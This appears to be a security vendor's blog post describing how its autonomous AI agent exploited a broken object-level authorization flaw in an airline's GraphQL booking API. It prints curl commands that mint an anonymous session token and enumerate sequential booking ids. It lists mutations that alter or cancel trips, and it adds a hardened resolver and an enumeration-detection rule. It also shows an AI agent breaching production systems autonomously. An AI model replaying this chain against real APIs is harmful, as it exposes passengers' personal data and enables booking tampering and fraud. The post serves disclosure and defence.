This Red Agent POV focuses on Broken Object-Level Authorization (BOLA) and deep dives into a critical authorization bypass vulnerability discovered in an airline’s GraphQL booking API. As part of its ongoing mission, the Red Agent continuously scans the public internet and our customers, helping uncover exploitable risks in the wild. Operating fully autonomously, the Red Agent mapped the backend architecture, established an anonymous session, and verified mass data extraction within 15 minutes. This exploit exposed high-profile passenger data, yielding complete read and write capabilities over active travel itineraries.
What is Broken Object-Level Authorization (BOLA)?
Broken Object-Level Authorization occurs when an application fails to validate whether a user has the required permissions to access a specific object or record. It currently occupies the top spot on the OWASP API Security Top 10 list.
In modern cloud architectures, APIs act as direct programmatic gateways to microservices, orchestration layers, and sensitive data lakes. When developers rely on predictable identifiers without enforcing strict, user-specific authorization checks at the backend resolver layer, the entire system becomes exposed. Attackers can manipulate identifiers in API requests to bypass frontend validation controls entirely, allowing them to reach core databases and regulated user records directly.
What did the Red Agent discover?
The Red Agent discovered that the airline’s GraphQL booking API used sequential integer identifiers without implementing backend authorization checks. While the application enforced front-end authentication by generating distinct session tokens for different user roles (such as anonymous, registered, and corporate users), downstream API resolvers failed to validate these roles when processing data requests.
By submitting sequential booking numbers to these unprotected resolvers, the Red Agent gained unauthenticated access to the passenger database. This permitted the extraction of travel records spanning two years, including names, dates of birth, billing addresses, masked credit cards, and live flight itineraries. Beyond data exfiltration, the anonymous session also possessed the permissions required to modify or delete active bookings.
| Mutation | Operational Impact |
|---|---|
| contactsChange + bookingSet | Alter contact emails to completely hijack customer accounts |
| flightDelete | Quietly delete flight segments and cancel active trips |
| groupDivide | Arbitrarily separate passengers from their travel groups |
| priceOverride | Manually override flight pricing structures to zero out costs |
| refundIssue / voidRefund | Issue unauthorized financial refunds to arbitrary accounts |
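The resolver pattern described above, written in JavaScript as an added example that is neither the airline’s code nor the Red Agent’s: the vulnerable shape (any session token can read any booking by its integer id) beside a hardened resolver that enforces object-level authorization. The in-memory booking store, role names and field names are constructed for illustration.

```javascript
// Added example (not the airline's or the Red Agent's code). An in-memory
// booking store and session roles are constructed for illustration.
const BOOKINGS = new Map([
  [144, { bookingId: 144, ownerId: 'user-a', recordLocator: 'ABC123' }],
  [145, { bookingId: 145, ownerId: 'user-b', recordLocator: 'DEF456' }],
]);

class AuthorizationError extends Error {}

// VULNERABLE shape: the resolver only checks that *some* session token is
// present, then looks the booking up by its guessable integer id. Ownership
// and role are never consulted, so an anonymous token reads any record.
function bookingRetrieveByBookingIdVulnerable(args, ctx) {
  if (!ctx.session) throw new AuthorizationError('no session');
  return BOOKINGS.get(args.bookingId) ?? null;
}

// HARDENED: object-level authorization decided per object, deny by default.
// Anonymous web sessions may not read bookings at all; a registered session
// may read only a booking it owns.
function bookingRetrieveByBookingId(args, ctx) {
  const session = ctx.session;
  if (!session || session.role === 'ANONYMOUS_WEB') {
    throw new AuthorizationError('authentication required');
  }
  const booking = BOOKINGS.get(args.bookingId);
  // Same error for "not found" and "not yours", so responses do not reveal
  // which ids exist in the sequential id space.
  if (!booking || booking.ownerId !== session.userId) {
    throw new AuthorizationError('booking not accessible');
  }
  return booking;
}

// Demonstration helper: returns the record locator on success, 'denied' on an
// authorization failure, 'none' when the vulnerable resolver finds nothing.
function tryRead(resolver, bookingId, session) {
  try {
    const b = resolver({ bookingId }, { session });
    return b ? b.recordLocator : 'none';
  } catch (e) {
    if (e instanceof AuthorizationError) return 'denied';
    throw e;
  }
}

const ANON = { role: 'ANONYMOUS_WEB', userId: null };
const USER_B = { role: 'REGISTERED', userId: 'user-b' };
```

Run `tryRead(bookingRetrieveByBookingIdVulnerable, 144, ANON)` and then the same call against `bookingRetrieveByBookingId` to see the anonymous session succeed against the first and be refused by the second.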
How did it find the exploit?
The Red Agent approached the target with zero prior knowledge, relying only on reasoning-driven testing to build a dynamic mental model of the system and adapt its scanning accordingly.
The target
The target was the primary public web infrastructure of the airline. The Red Agent initiated its assessment with a single root URL and no additional context, seeds, or credentials. Its early hypotheses focused on mapping public-facing entry points, discovering backend API endpoints, identifying session management mechanisms, and probing for parameter handling inconsistencies within the booking workflows.
Phase 1: Client-Side Mapping and Session Minting
The Red Agent began by systematically analyzing the client-side JavaScript bundles downloaded by a standard visitor to the homepage. From this analysis, it extracted the structural footprint of the backend architecture, which allowed it to discover the core API gateway at a dedicated subdomain and identify a multi-step token acquisition flow.
The agent hypothesized that it could replay this sequence to obtain a valid session. It executed the token flow using empty credentials, adapting based on observed responses to successfully mint an anonymous web session token.
```bash
# Step 1: Request initial token with zero credentials
curl -s -X POST 'https://api.[redacted]/api/kdf/v2/token' \
  -H 'Content-Type: application/json' \
  -d '{"credentials":{"channelType":"DigitalWeb"}}'

# Step 2: Exchange initial token for an anonymous session token
curl -s 'https://api.[redacted]/api/kdf/v1/token' \
  -H 'Authorization: Bearer <initial_token>'
```

The server issued a session token with an anonymous web role code, structurally intended only for unauthenticated browsing of public flight schedules.
Phase 2: GraphQL Schema Introspection
Armed with a valid anonymous session token, the Red Agent issued a comprehensive GraphQL introspection query to dynamically map the backend schema. The response revealed a massive footprint: 514 queries and 428 mutations, all available to the anonymous session.
The agent analyzed these mutations and flagged several highly sensitive operations that accepted simple integer parameters, such as bookingRetrieveByBookingId. It developed a hypothesis that these endpoints might lack proper backend validation and focused its investigation there.
The Breakthrough
The breakthrough occurred when the Red Agent formulated a targeted mutation payload designed to query a specific, predicted integer booking ID:
```bash
curl -s -X POST 'https://api.[redacted]/api/v1/graph' \
  -H 'Authorization: Bearer <anonymous_session_token>' \
  -H 'Content-Type: application/json' \
  -d '{"query":"mutation { bookingRetrieveByBookingId(bookingId: 144 (redacted)) { recordLocator passengers { key value { name { first last } } } contacts { key value { emailAddress phoneNumbers { number } } } journeys { designator { origin destination departure } } } }"}'
```
The backend processed the request and returned the complete, unredacted booking record of an active customer. To confirm this was systemic, the Red Agent tested twenty sequential IDs. Every single request returned a distinct customer profile including names, contact details, billing addresses, and flight itineraries.
Data Exposure Validation
The agent cross-referenced these findings with supplementary REST endpoints to validate the full extent of data exposure:
- GET /api/kdf/v1/booking/passengers - full names, dates of birth, gender profiles
- GET /api/kdf/v1/booking/contacts - personal email addresses, direct phone numbers
- GET /api/kdf/v1/booking/payments - masked credit cards, verified billing addresses

```json
{
  "recordLocator": "REDACTED",
  "passengers": [{"name": {"first": "████", "last": "████"}, "dateOfBirth": "1995-██-██"}],
  "contacts": [{"emailAddress": "████@gmail.com", "phoneNumbers": [{"number": "+1-███-███-████"}]}],
  "payments": [{"cardNumber": "████████████5781", "expiration": "2028-09",
    "avs": {"streetAddress": "████ ██████ Blvd", "city": "████████", "state": "██"}}],
  "journeys": [{"designator": {"origin": "███", "destination": "███", "departure": "███"}}]
}
```

It validated the exposure of this data per booking: full name, date of birth, email, phone, billing address, masked credit card with expiration, loyalty number, and complete itinerary.
Why this matters
Traditional DAST scanners and signature-based tools cannot detect this class of logic flaw. Because the request uses entirely valid GraphQL syntax against legitimate endpoints, it does not look unusual to a standard security tool. The winning payload had no static signature; uncovering it required a dynamic mental model capable of connecting multiple sequential observations.
The Red Agent had to read client-side code, dynamically extract authentication flows, map an entire GraphQL schema, and recognize the architectural relationship between anonymous tokens and unprotected data resolvers. This application-layer vulnerability drastically expands the blast radius within the cloud environment. By exposing core database resolvers to unauthenticated internet traffic, a simple logic flaw effectively nullifies all network perimeter security. In modern cloud architectures, ensuring robust, context-aware authorization at the object level is the only way to prevent automated agents from compromising entire data layers in a matter of minutes.
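One way a defender can catch this pattern without a payload signature, added here as an example and not part of the original post: a behavioural rule over API gateway request logs that flags a single session token reading many distinct, consecutive booking ids on the booking resolver. The log format, field names, session role values and thresholds are assumptions, and the log lines are constructed.

```javascript
// Added example, not from the original post. Log format, field names and
// thresholds are assumptions; the log lines below are constructed.
const logLine = (ts, session, role, op, bookingId) =>
  JSON.stringify({ ts, session, role, op, bookingId, status: 200 });

const SAMPLE_LOGS = [
  // one anonymous session walking six consecutive booking ids
  ...[144, 145, 146, 147, 148, 149].map((id, i) =>
    logLine(i, 'tokA', 'ANONYMOUS_WEB', 'bookingRetrieveByBookingId', id)),
  // a registered user reading two of their own bookings: benign
  logLine(10, 'tokB', 'REGISTERED', 'bookingRetrieveByBookingId', 901),
  logLine(11, 'tokB', 'REGISTERED', 'bookingRetrieveByBookingId', 902),
  // anonymous browsing of public schedules: not the watched resolver
  logLine(12, 'tokC', 'ANONYMOUS_WEB', 'flightSearch'),
];

const RULE = { op: 'bookingRetrieveByBookingId', minDistinctIds: 5, minConsecutiveRun: 4 };

// Longest run of consecutive integers in a sorted, de-duplicated array.
function longestConsecutiveRun(sortedIds) {
  let best = 0, run = 0;
  for (let i = 0; i < sortedIds.length; i++) {
    run = i > 0 && sortedIds[i] === sortedIds[i - 1] + 1 ? run + 1 : 1;
    best = Math.max(best, run);
  }
  return best;
}

// Groups calls to the watched resolver by session token and alerts when one
// session has read many distinct, mostly consecutive booking ids. Every single
// request is syntactically legitimate; only the aggregate behaviour is abnormal.
function detectEnumeration(lines, rule = RULE) {
  const perSession = new Map();
  for (const line of lines) {
    const rec = JSON.parse(line);
    if (rec.op !== rule.op || typeof rec.bookingId !== 'number') continue;
    const s = perSession.get(rec.session) ?? { role: rec.role, ids: new Set() };
    s.ids.add(rec.bookingId);
    perSession.set(rec.session, s);
  }
  const alerts = [];
  for (const [session, s] of perSession) {
    const ids = [...s.ids].sort((a, b) => a - b);
    const run = longestConsecutiveRun(ids);
    if (ids.length >= rule.minDistinctIds && run >= rule.minConsecutiveRun) {
      alerts.push({ session, role: s.role, distinctIds: ids.length, consecutiveRun: run,
                    severity: s.role === 'ANONYMOUS_WEB' ? 'critical' : 'high' });
    }
  }
  return alerts;
}
```

In production the rule would also bound the observation window and key on the token plus source address, but the core signal is the same: an anonymous role should never be reading booking records at all, let alone walking the id space.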
Key Takeaways
AI attackers are already here: An AI agent autonomously read JavaScript, minted a session, discovered the API schema, identified an authorization gap, and confirmed mass data access to a major airline’s booking database, all within 15 minutes, with zero human guidance. Any attacker with access to a frontier model can replicate this chain today. The barrier to breaching production systems has fundamentally shifted.
The basics are the breach: This wasn’t a complex bug. It was a missing authorization check on a sequential integer ID, the OWASP API Security Top 10 #1 risk since 2019. Object-level access checks on every resolver, non-guessable identifiers, and restricted GraphQL introspection in production are known mitigations that most organizations don’t deploy, and that coding agents don’t apply by default when vibe coding applications.
Conventional scanners are blind to this class of vulnerability: The Red Agent forms and tests a hypothesis about every endpoint it touches, which lets it discover multi-step risks that remain blind spots for traditional signature-based scanners.
Want to see more from the Red Agent?
We will be sharing more examples of the risks Red Agent uncovers. If you would like to see what types of risks it can find in your environment, learn more about the Red Agent (login required) or schedule a live demo with our team.